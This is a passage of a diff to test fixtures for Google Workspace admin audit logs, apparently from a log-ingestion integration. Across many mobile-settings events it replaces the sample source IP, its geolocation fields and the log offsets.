- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -905,7 +841,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change",
@@ -920,27 +856,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 7908,
+ "log.offset": 7892,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -965,7 +897,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -981,26 +913,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 8364,
+ "log.offset": 8347,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1021,7 +949,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_ADMIN_RESTRICTIONS_PIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_ADMIN_RESTRICTIONS_PIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1034,26 +962,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 8898,
+ "log.offset": 8880,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1074,7 +998,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1087,27 +1011,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 9328,
+ "log.offset": 9309,
 "network.name": "network",
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1128,7 +1048,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1141,27 +1061,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 9817,
+ "log.offset": 9797,
 "network.name": "network",
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1182,7 +1098,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1195,27 +1111,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 10303,
+ "log.offset": 10282,
 "network.name": "network",
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1236,7 +1148,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1249,27 +1161,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 10792,
+ "log.offset": 10770,
 "network.name": "network",
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1290,7 +1198,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"cert\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"cert\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1304,26 +1212,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 11290,
+ "log.offset": 11267,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1344,7 +1248,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT\"}}",
 "event.provider": "admin",
 "event.type": [
 "info"
@@ -1355,26 +1259,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 11773,
+ "log.offset": 11749,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1395,7 +1295,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT\"}}",
 "event.provider": "admin",
 "event.type": [
 "info"
@@ -1406,26 +1306,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 12110,
+ "log.offset": 12085,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1446,7 +1342,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS\"}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS\"}}",
 "event.provider": "admin",
 "event.type": [
 "info"
@@ -1457,26 +1353,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 12440,
+ "log.offset": 12414,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1497,7 +1389,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS\"}}",
